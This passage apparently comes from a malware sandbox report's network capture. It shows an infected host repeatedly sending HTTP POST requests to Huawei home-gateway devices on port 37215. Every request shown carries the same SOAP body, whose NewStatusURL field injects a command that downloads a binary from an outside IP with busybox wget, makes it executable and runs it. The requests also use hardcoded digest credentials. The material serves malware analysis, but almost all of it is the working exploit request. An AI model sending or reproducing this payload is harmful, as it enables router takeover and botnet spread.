6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361607075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233045101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999571085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      62192.168.2.1444488156.76.30.24737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.630681992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      63192.168.2.1451894197.17.34.037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.632128000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.690150023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938234091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      64192.168.2.143755041.88.227.9237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.633661032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      65192.168.2.1453280156.112.9.5337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.634716034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.978087902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482121944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
